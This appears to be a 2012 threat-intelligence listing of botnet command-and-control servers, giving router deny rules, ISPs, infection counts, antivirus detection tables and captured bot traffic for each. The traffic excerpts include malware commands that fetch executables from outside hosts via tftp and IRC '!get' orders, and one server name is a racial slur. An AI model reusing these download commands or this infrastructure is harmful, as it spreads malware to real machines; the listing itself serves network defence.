Download our list of the most observed botnet command and control server IP addresses.
Most Prolific BotNet Command and Control Servers and Filters
Sun Feb 12 08:41:25 2012
| Priority | 100 |
| TCP Ports | 80 |
| Filter | deny ip host 213.155.14.161 any log ! 225 infects 01/04/12 to 02/11/12 - |
| ISP | ossadchy - osadchiy yuriy |
| Clients | 225 |
| Country | ukraine |
| Activity | |
| Domain | - |

Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 95.75.158.158:2384
- Server: GET /index.php?id=vswzrfxuxmxd&scn=4&inf=0&ver=19&cnt=USA...
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

| Priority | 26 |
| TCP Ports | 65520 |
| Filter | deny ip host 83.133.119.197 any log ! 26 infects 01/06/12 to 02/10/12 greatnet.de |
| ISP | lncde-greatnet-newmedia |
| Clients | 26 |
| Country | germany |
| Activity | |
| Domain | greatnet.de |

Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 110.12.70.106 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 110.12.70.106 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK qhfheepvUSER r020501 . . :-
- Client: JOIN &virtu
- Server: :u. PRIVMSG qhfheepv :!get http:/91.202.244.57/pac.txt:u. PRIVMSG...
- Client: GET /pac.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/PreLoader_59fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
- Server: PONG :j.
- Client: JOIN &virtu
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | Gen_Heur.FKP.1 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Gen_Heur.FKP.1 |
| Ikarus | Trojan-Downloader.Cutwail |
| Kaspersky | HEUR_Generic |
| McAfee | MISSED |
| Microsoft | TrojanDownloader_Cutwail.BF |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-AAY |
| Sunbelt | MISSED |
| Symantec | Zbot |
| TheHacker | Posible_Worm32 |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

| Priority | 5 |
| TCP Ports | 65520 |
| Filter | deny ip host 94.63.149.150 any log ! 5 infects 01/06/12 to 01/09/12 ipv4ilink.net |
| ISP | evolva telecom s.r.l |
| Clients | 5 |
| Country | romania |
| Activity | |
| Domain | ipv4ilink.net |

Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 1.250.41.32 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 1.250.41.32 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK qledpdksUSER c020501 . . :_
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut |
| AntiVir | Virut.A |
| Authentium | Virut.4960 |
| Avast | _Virut-B |
| AVG | Virut.A |
| BitDefender | Virtob.6.Gen |
| CAT-QuickHeal | Virut.A |
| ClamAV | Virut.A |
| DrWeb | Virut |
| eSafe | Virut.a |
| eTrust-Vet | Virut.5127 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.A |
| F-Prot | Virut.4960 |
| F-Secure | Virut.a |
| Ikarus | Virut.a |
| Kaspersky | Virut.a |
| McAfee | Virut.a |
| Microsoft | Virut.A |
| NOD32v2 | Virut.5127 |
| Norman | Virut.A |
| Panda | Virutas.B |
| Prevx1 | MISSED |
| Rising | Virut.a |
| Sophos | Virut-T |
| Sunbelt | MISSED |
| Symantec | Virut.A |
| TheHacker | Virut.gen |
| TrendMicro | PE_VIRUT.A |
| VBA32 | Virut.A |
| VirusBuster | Virut.Gen.4 |
| Webwasher Gateway | Virut.A |

| Priority | 4 |
| TCP Ports | 6900 |
| Filter | deny ip host 190.96.181.218 any log ! 4 infects 01/18/12 to 01/18/12 - |
| ISP | telebucaramanga s.a. e.s.p |
| Clients | 4 |
| Country | colombia |
| Activity | |
| Domain | - |

Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR agl23.exe
- Server: 150 Opening BINARY mode data connection
- Server: 221 Goodbye happy r00ting.
- Client: NICK USA|32543USER vlskn 0 0 :USA|32543
- Server: :fucken.niggerz NOTICE USA|32543 :*** If you are having problems...
- Server: PONG :F3D4BA8
- Client: JOIN ##TZ getsome
- Client: USERHOST USA|32543
- Client: MODE USA|32543 -x+iJOIN ##TZ getsomeUSERHOST USA|32543MODE...
- Server: PONG :fucken.niggerz
- Server: PONG :fucken.niggerz
- Server: PING :fucken.niggerz:retry!email@fucken.niggerz QUIT :Quit:...
- Server: PONG :fucken.niggerz
BotClient Antivirus Diagnoses
| AhnLab-V3 | DropperVB |
| AntiVir | TRJorik.lcbta |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | Generic26.BSSV |
| BitDefender | Gen_Variant.Graftor.12997 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MulDrop3.27505 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | VBInjector.W!tr |
| F-Prot | MISSED |
| F-Secure | Gen_Variant.Graftor.12997 |
| Ikarus | Jorik |
| Kaspersky | Jorik.Llac.cbt |
| McAfee | MISSED |
| Microsoft | Ircbrute |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | Gen |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 65520, 91 |
| Filter | deny ip host 94.63.147.131 any log ! 1 infects 02/06/12 to 02/06/12 ipv4ilink.net |
| ISP | evolva telecom s.r.l |
| Clients | 1 |
| Country | romania |
| Activity | |
| Domain | ipv4ilink.net |

Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 110.14.197.56 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 110.14.197.56 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK xfpqzeilUSER p020501 . . :-
- Client: JOIN &virtu
- Server: :u. PRIVMSG xfpqzeil :!get http:/ghyt54.com/pac33.txt:u. PRIVMSG...
- Client: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Server: PONG :k.
- Client: JOIN &virtu
- Server: NICK qpuobuffUSER q020501 . . :-
- Client: JOIN &virtu
- Server: :u. PRIVMSG qpuobuff :!get http:/largokal.net/ex.exe:u. PRIVMSG...
- Server: GET /ex.exe HTTP/1.0User-Agent: DownloadHost: largokal.netPragma:...
- Server: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
- Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
BotClient Antivirus Diagnoses
| AhnLab-V3 | Welchia.10240 |
| AntiVir | Nachi.A.1 |
| Authentium | MISSED |
| Avast | _Virut |
| AVG | Nachi.A |
| BitDefender | Generic.22648 |
| CAT-QuickHeal | MISSED |
| ClamAV | Virut.ca |
| DrWeb | Virut.5 |
| eSafe | Virut.gen |
| eTrust-Vet | Virut.9276 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.fam |
| F-Prot | Virut.9264 |
| F-Secure | Generic.22648 |
| Ikarus | Virut |
| Kaspersky | Welchia.s |
| McAfee | Nachi.a |
| Microsoft | Virut.AK |
| NOD32v2 | MISSED |
| Norman | Virut.D2 |
| Panda | Virutas.gen |
| Prevx1 | MISSED |
| Rising | Virut.du |
| Sophos | Vetor-A |
| Sunbelt | MISSED |
| Symantec | Virut.B |
| TheHacker | Virut.gen2 |
| TrendMicro | PE_VIRUT.D-4 |
| VBA32 | Virut.3 |
| VirusBuster | Virut.Gen |
| Webwasher Gateway | MISSED |

| Priority | 1 |
| TCP Ports | 65520 |
| Filter | deny ip host 91.226.212.159 any log ! 1 infects 02/07/12 to 02/07/12 nacksystem.net |
| ISP | eu-zz |
| Clients | 1 |
| Country | united kingdom |
| Activity | |
| Domain | nacksystem.net |

Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 1.247.138.126 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 1.247.138.126 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK uyhvnrnqUSER f020500 . . :_
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG uyhvnrnq :!get http:/188.247.135.95/555.exe:u...
- Client: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | Gen_Heur.FKP.1 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Gen_Heur.FKP.1 |
| Ikarus | Trojan-Downloader.Cutwail |
| Kaspersky | HEUR_Generic |
| McAfee | MISSED |
| Microsoft | TrojanDownloader_Cutwail.BF |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalEncPk-AAY |
| Sunbelt | MISSED |
| Symantec | Zbot |
| TheHacker | Posible_Worm32 |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
| Webwasher Gateway | MISSED |